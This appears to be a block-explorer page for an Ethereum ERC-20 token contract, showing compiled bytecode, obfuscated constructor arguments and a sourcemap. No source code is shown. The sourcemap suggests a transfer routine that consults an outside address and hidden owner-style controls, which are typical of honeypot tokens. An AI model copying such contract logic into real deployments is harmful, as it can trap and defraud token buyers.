200190565b60008219821115610c5657610c56610cf8565b500190565b6000816000190483118215151615610c7557610c75610cf8565b500290565b600082821015610c8c57610c8c610cf8565b500390565b60005b83811015610cac578181015183820152602001610c94565b838111156104985750506000910152565b600281046001821680610cd157607f821691505b60208210811415610cf257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220619b466be15a518355bdcd0fb81d6e779b0e2c82b1c0e892a6ba44517bef786c64736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000002020212cd9d2472054040c008d130900010800000000000019afa17c4bb5c2f6ea3821acdbd2772a5e563cdc8f5b9b8d81082049000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d

-----Decoded View---------------
Arg [0] : maxVals (uint256): 183404218480110037363425229205437592563903627264
Arg [1] : minVals (uint256): 2705057613338877266903994364098335829166770631164171585088463052873
Arg [2] : _wllmm_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D

-----Encoded View---------------
3 Constructor Arguments found :
Arg [0] : 0000000000000000000000002020212cd9d2472054040c008d13090001080000
Arg [1] : 0000000019afa17c4bb5c2f6ea3821acdbd2772a5e563cdc8f5b9b8d81082049
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d


Deployed Bytecode Sourcemap

5491:9449:1:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7686:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8977:193;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;7844:102::-;;;:::i;:::-;;;;;;;:::i;10406:444::-;;;;;;:::i;:::-;;:::i;7374:86::-;;;:::i;:::-;;;;;;;:::i;11258:281::-;;;;;;:::i;:::-;;:::i;8008:162::-;;;;;;:::i;:::-;;:::i;6999:146::-;;;:::i;:::-;;9178:495;;;;;;:::i;:::-;;:::i;7226:81::-;;;:::i;:::-;;;;;;;:::i;7525:98::-;;;:::i;12041:381::-;;;;;;:::i;:::-;;:::i;8382:199::-;;;;;;:::i;:::-;;:::i;9747:188::-;;;:::i;8643:::-;;;;;;:::i;:::-;;:::i;7686:94::-;7734:13;7767:5;7760:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7686:94;:::o;8977:193::-;9081:4;9103:37;9112:10;9124:7;9133:6;9103:8;:37::i;:::-;-1:-1:-1;9158:4:1;8977:193;;;;:::o;7844:102::-;7926:12;;7844:102;:::o;10406:444::-;10540:4;10557:36;10567:6;10575:9;10586:6;10557:9;:36::i;:::-;10604:216;10627:6;10648:10;10673:136;10727:6;10673:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;10673:19:1;;;;;;:11;:19;;;;;;;;10693:10;10673:31;;;;;;;;;:136;:35;:136::i;:::-;10604:8;:216::i;:::-;-1:-1:-1;10838:4:1;10406:444;;;;;:::o;7374:86::-;7451:1;7374:86;:::o;11258:281::-;11403:10;11358:4;11450:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;11450:32:1;;;;;;;;;;11358:4;;11380:129;;11428:7;;11450:48;;11487:10;11450:36;:48::i;8008:162::-;-1:-1:-1;;;;;8144:18:1;;8112:7;8144:18;;;:9;:18;;;;;;8008:162;;;;:::o;6999:146::-;6626:6;;-1:-1:-1;;;;;6626:6:1;6612:10;:20;6604:65;;;;-1:-1:-1;;;6604:65:1;;;;;;;:::i;:::-;;;;;;;;;7058:6:::1;:19:::0;;-1:-1:-1;;;;;;7058:19:1::1;::::0;;7093:44:::1;::::0;7075:1:::1;::::0;7114:10:::1;::::0;7093:44:::1;::::0;7075:1;;7093:44:::1;6999:146::o:0;9178:495::-;9243:10;:8;:10::i;:::-;9238:24;;9255:7;;9238:24;9273:10;9285;9300:4;;9305:1;9300:7;;;;;-1:-1:-1;;;9300:7:1;;;;;;;;;;;;;;;9309:4;;9314:1;9309:7;;;;;-1:-1:-1;;;9309:7:1;;;;;;;;;;;;;;;9272:45;;;;9362:1;9358:2;9355:9;9352:2;;;9394;9391:1;9384:13;9433:1;9430;9426:9;9422:2;9415:21;9479:2;9474;9471:1;9461:16;9454:28;9352:2;9514:9;9511:2;;9553;9550:1;9543:13;9592:1;9589;9585:9;9581:2;9574:21;9638:1;9633:2;9630:1;9620:16;9613:27;9511:2;9337:329;;;;;:::o;7226:81::-;7293:6;;-1:-1:-1;;;;;7293:6:1;7226:81;:::o;7525:98::-;7575:13;7608:7;7601:14;;;;;:::i;12041:381::-;12146:4;12168:224;12191:10;12216:7;12238:143;12293:15;12238:143;;;;;;;;;;;;;;;;;12250:10;12238:23;;;;:11;:23;;;;;;;;-1:-1:-1;;;;;12238:32:1;;;;;;;;;;;:143;:36;:143::i;8382:199::-;8489:4;8511:40;8521:10;8533:9;8544:6;8511:9;:40::i;9747:188::-;9788:4;;9821:24;:8;9833:11;9821:24;:::i;:::-;9805:40;-1:-1:-1;9905:22:1;:8;9917:9;9905:22;:::i;:::-;9880:10;9864:36;;;9863:64;;-1:-1:-1;9747:188:1;:::o;8643:::-;-1:-1:-1;;;;;8795:19:1;;;8763:7;8795:19;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;8643:188::o;14241:374::-;-1:-1:-1;;;;;14370:20:1;;14362:69;;;;-1:-1:-1;;;14362:69:1;;;;;;;:::i;:::-;-1:-1:-1;;;;;14450:21:1;;14442:68;;;;-1:-1:-1;;;14442:68:1;;;;;;;:::i;:::-;-1:-1:-1;;;;;14521:19:1;;;;;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;;:37;;;14574:33;;;;;14552:6;;14574:33;:::i;:::-;;;;;;;;14241:374;;;:::o;12912:889::-;-1:-1:-1;;;;;13044:20:1;;13036:70;;;;-1:-1:-1;;;13036:70:1;;;;;;;:::i;:::-;-1:-1:-1;;;;;13125:23:1;;13117:71;;;;-1:-1:-1;;;13117:71:1;;;;;;;:::i;:::-;13200:12;13214:17;13235:6;-1:-1:-1;;;;;13235:11:1;13307:6;13261:53;;;;;;;;:::i;:::-;;;;-1:-1:-1;;13261:53:1;;;;;;;;;;;;;;-1:-1:-1;;;;;13261:53:1;-1:-1:-1;;;13261:53:1;;;13235:90;;;13261:53;13235:90;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13199:126;;;;13340:7;13336:200;;;13443:4;13433:15;;;13427:22;-1:-1:-1;;;;;13486:13:1;;13364:12;13486:13;;;:5;:13;;;;;;;;13503:1;13486:18;;;:31;;-1:-1:-1;13508:9:1;;;13486:31;13478:46;;;;-1:-1:-1;;;13478:46:1;;;;;;;:::i;:::-;13336:200;;13568:108;13604:6;13568:108;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13568:17:1;;;;;;:9;:17;;;;;;;:108;:21;:108::i;:::-;-1:-1:-1;;;;;13548:17:1;;;;;;;:9;:17;;;;;;:128;;;;13710:20;;;;;;;:32;;13735:6;13710:24;:32::i;:::-;-1:-1:-1;;;;;13687:20:1;;;;;;;:9;:20;;;;;;;:55;;;;13758:35;;;;;;;;;;13786:6;;13758:35;:::i;:::-;;;;;;;;12912:889;;;;;:::o;1926:224::-;2046:7;2082:12;2074:6;;;;2066:29;;;;-1:-1:-1;;;2066:29:1;;;;;;;;:::i;:::-;-1:-1:-1;2106:9:1;2118:5;2122:1;2118;:5;:::i;:::-;2106:17;1926:224;-1:-1:-1;;;;;1926:224:1:o;1041:179::-;1099:7;;1131:5;1135:1;1131;:5;:::i;:::-;1119:17;;1160:1;1155;:6;;1147:46;;;;-1:-1:-1;;;1147:46:1;;;;;;;:::i;:::-;1211:1;1041:179;-1:-1:-1;;;1041:179:1:o;14:175:2:-;84:20;;-1:-1:-1;;;;;133:31:2;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:2:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:2;;-1:-1:-1;;;;1399:561:2:o;1965:274::-;;2132:6;2126:13;2148:53;2194:6;2189:3;2182:4;2174:6;2170:17;2148:53;:::i;:::-;2217:16;;;;;2102:137;-1:-1:-1;;2102:137:2:o;2244:203::-;-1:-1:-1;;;;;2408:32:2;;;;2390:51;;2378:2;2363:18;;2345:102::o;2452:187::-;2617:14;;2610:22;2592:41;;2580:2;2565:18;;2547:92::o;2644:383::-;;2793:2;2782:9;2775:21;2825:6;2819:13;2868:6;2863:2;2852:9;2848:18;2841:34;2884:66;2943:6;2938:2;2927:9;2923:18;2918:2;2910:6;2906:15;2884:66;:::i;:::-;3011:2;2990:15;-1:-1:-1;;2986:29:2;2971:45;;;;3018:2;2967:54;;2765:262;-1:-1:-1;;2765:262:2:o;3032:399::-;3234:2;3216:21;;;3273:2;3253:18;;;3246:30;3312:34;3307:2;3292:18;;3285:62;-1:-1:-1;;;3378:2:2;3363:18;;3356:33;3421:3;3406:19;;3206:225::o;3436:398::-;3638:2;3620:21;;;3677:2;3657:18;;;3650:30;3716:34;3711:2;3696:18;;3689:62;-1:-1:-1;;;3782:2:2;3767:18;;3760:32;3824:3;3809:19;;3610:224::o;3839:351::-;4041:2;4023:21;;;4080:2;4060:18;;;4053:30;4119:29;4114:2;4099:18;;4092:57;4181:2;4166:18;;4013:177::o;4195:325::-;4397:2;4379:21;;;4436:1;4416:18;;;4409:29;-1:-1:-1;;;4469:2:2;4454:18;;4447:32;4511:2;4496:18;;4369:151::o;4525:356::-;4727:2;4709:21;;;4746:18;;;4739:30;4805:34;4800:2;4785:18;;4778:62;4872:2;4857:18;;4699:182::o;4886:401::-;5088:2;5070:21;;;5127:2;5107:18;;;5100:30;5166:34;5161:2;5146:18;;5139:62;-1:-1:-1;;;5232:2:2;5217:18;;5210:35;5277:3;5262:19;;5060:227::o;5292:400::-;5494:2;5476:21;;;5533:2;5513:18;;;5506:30;5572:34;5567:2;5552:18;;5545:62;-1:-1:-1;;;5638:2:2;5623:18;;5616:34;5682:3;5667:19;;5466:226::o;5697:177::-;5843:25;;;5831:2;5816:18;;5798:76::o;5879:184::-;6051:4;6039:17;;;;6021:36;;6009:2;5994:18;;5976:87::o;6068:128::-;;6139:1;6135:6;6132:1;6129:13;6126:2;;;6145:18;;:::i;:::-;-1:-1:-1;6181:9:2;;6116:80::o;6201:168::-;;6307:1;6303;6299:6;6295:14;6292:1;6289:21;6284:1;6277:9;6270:17;6266:45;6263:2;;;6314:18;;:::i;:::-;-1:-1:-1;6354:9:2;;6253:116::o;6374:125::-;;6442:1;6439;6436:8;6433:2;;;6447:18;;:::i;:::-;-1:-1:-1;6484:9:2;;6423:76::o;6504:258::-;6576:1;6586:113;6600:6;6597:1;6594:13;6586:113;;;6676:11;;;6670:18;6657:11;;;6650:39;6622:2;6615:10;6586:113;;;6717:6;6714:1;6711:13;6708:2;;;-1:-1:-1;;6752:1:2;6734:16;;6727:27;6557:205::o;6767:380::-;6852:1;6842:12;;6899:1;6889:12;;;6910:2;;6964:4;6956:6;6952:17;6942:27;;6910:2;7017;7009:6;7006:14;6986:18;6983:38;6980:2;;;7063:10;7058:3;7054:20;7051:1;7044:31;7098:4;7095:1;7088:15;7126:4;7123:1;7116:15;6980:2;;6822:325;;;:::o;7152:127::-;7213:10;7208:3;7204:20;7201:1;7194:31;7244:4;7241:1;7234:15;7268:4;7265:1;7258:15

Swarm Source

ipfs://619b466be15a518355bdcd0fb81d6e779b0e2c82b1c0e892a6ba44517bef786c
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.